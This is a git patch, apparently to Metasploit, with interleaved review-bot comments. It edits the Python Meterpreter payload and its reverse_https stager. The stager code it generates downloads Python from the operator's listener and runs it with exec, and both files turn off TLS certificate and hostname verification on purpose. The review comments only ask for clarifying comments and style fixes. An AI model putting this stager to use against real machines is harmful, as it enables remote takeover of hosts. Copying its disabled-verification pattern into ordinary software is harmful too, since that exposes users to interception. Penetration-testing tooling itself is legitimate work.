From 10e8cefd6d4a0cd5e43164decda74624ad386151 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre
Date: Wed, 25 Mar 2015 19:49:42 -0400
Subject: [PATCH] Pymet dont validate ssl certs for 2.7.9/3.4.3
---
 data/meterpreter/meterpreter.py | 15 +++++++----
 .../payloads/stagers/python/reverse_https.rb | 26 ++++++++++++++-----
 2 files changed, 30 insertions(+), 11 deletions(-)
diff --git a/data/meterpreter/meterpreter.py b/data/meterpreter/meterpreter.py
index cb73e1bf45..871a33335e 100644
--- a/data/meterpreter/meterpreter.py
+++ b/data/meterpreter/meterpreter.py
@@ -393,12 +393,17 @@ class PythonMeterpreter(object):
 print(msg)
 def driver_init_http(self):
+ opener_args = []
+ scheme = HTTP_CONNECTION_URL.split(':', 1)[0]
+ if scheme == 'https' and ((sys.version_info[0] == 2 and sys.version_info >= (2,7,9)) or sys.version_info >= (3,4,3)):
+ import ssl
+ ssl_ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
+ ssl_ctx.check_hostname=False
+ ssl_ctx.verify_mode=ssl.CERT_NONE
+ opener_args.append(urllib.HTTPSHandler(0, ssl_ctx))
 if HTTP_PROXY:
- scheme = HTTP_CONNECTION_URL.split(':', 1)[0]
- proxy_handler = urllib.ProxyHandler({scheme: HTTP_PROXY})
- opener = urllib.build_opener(proxy_handler)
- else:
- opener = urllib.build_opener()
+ opener_args.append(urllib.ProxyHandler({scheme: HTTP_PROXY}))
+ opener = urllib.build_opener(*opener_args)
 if HTTP_USER_AGENT:
 opener.addheaders = [('User-Agent', HTTP_USER_AGENT)]
 urllib.install_opener(opener)
diff --git a/modules/payloads/stagers/python/reverse_https.rb b/modules/payloads/stagers/python/reverse_https.rb
index 22f928f4b0..46ed021234 100644
--- a/modules/payloads/stagers/python/reverse_https.rb
+++ b/modules/payloads/stagers/python/reverse_https.rb
@@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_https'
 module Metasploit3
- CachedSize = 446
+ CachedSize = 742
 include Msf::Payload::Stager
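Review bot: Nothing in the added TLS block of driver_init_http says that certificate and hostname checking are switched off on purpose, or why the gate sits at 2.7.9 and 3.4.3, so a reader cannot tell a deliberate choice from an oversight. I would put a comment above the `if scheme == 'https' and ...` line such as `# 2.7.9 and 3.4.3 verify certificates by default; verification is disabled on purpose, so the server end of this connection is not authenticated`. The second reverse_https.rb hunk has the same gap: its `# Context added to HTTPSHandler in 2.7.9 and 3.4.3` comment does not mention that the generated branch disables verification. As a smaller style point, `urllib.HTTPSHandler(0, ssl_ctx)` would read better as `urllib.HTTPSHandler(context=ssl_ctx)`, and the two attribute assignments lack spaces around `=`. The method body continues past the end of the hunk.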
@@ -55,18 +55,32 @@ module Metasploit3
 proxy_host = datastore['PayloadProxyHost'].to_s
 proxy_port = datastore['PayloadProxyPort'].to_i
- cmd = "import sys\n"
 if proxy_host == ''
- cmd << "o=__import__({2:'urllib2',3:'urllib.request'}[sys.version_info[0]],fromlist=['build_opener']).build_opener()\n"
+ urllib_fromlist = "['HTTPSHandler','build_opener']"
 else
+ urllib_fromlist = "['HTTPSHandler','ProxyHandler','build_opener']"
+ end
+
+ cmd = "import sys\n"
+ cmd << "vi=sys.version_info\n"
+ cmd << "ul=__import__({2:'urllib2',3:'urllib.request'}[vi[0]],fromlist=#{urllib_fromlist})\n"
+ cmd << "hs=[]\n"
+ # Context added to HTTPSHandler in 2.7.9 and 3.4.3
+ cmd << "if (vi[0]==2 and vi>=(2,7,9)) or vi>=(3,4,3):\n"
+ cmd << "\timport ssl\n"
+ cmd << "\tsc=ssl.SSLContext(ssl.PROTOCOL_SSLv23)\n"
+ cmd << "\tsc.check_hostname=False\n"
+ cmd << "\tsc.verify_mode=ssl.CERT_NONE\n"
+ cmd << "\ths.append(ul.HTTPSHandler(0,sc))\n"
+
+ if proxy_host != ''
 proxy_url = Rex::Socket.is_ipv6?(proxy_host) ? "http://[#{proxy_host}]:#{proxy_port}" : "http://#{proxy_host}:#{proxy_port}"
-
- cmd << "ul=__import__({2:'urllib2',3:'urllib.request'}[sys.version_info[0]],fromlist=['ProxyHandler','build_opener'])\n"
- cmd << "o=ul.build_opener(ul.ProxyHandler({'https':'#{var_escape.call(proxy_url)}'}))\n"
+ cmd << "hs.append(ul.ProxyHandler({'https':'#{var_escape.call(proxy_url)}'}))\n"
 end
+ cmd << "o=ul.build_opener(*hs)\n"
 cmd << "o.addheaders=[('User-Agent','#{var_escape.call(datastore['MeterpreterUserAgent'])}')]\n"
 cmd << "exec(o.open('#{target_url}').read())\n"
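Review bot: The proxy condition is now tested twice with opposite senses, `if proxy_host == ''` to pick `urllib_fromlist` and later `if proxy_host != ''` to append the ProxyHandler line, so the import list and the handler that needs it are easy to let drift apart. Computing it once, for example `use_proxy = !proxy_host.empty?`, and writing both sites against that local would keep the two halves visibly tied together. The enclosing method begins and ends outside the hunk.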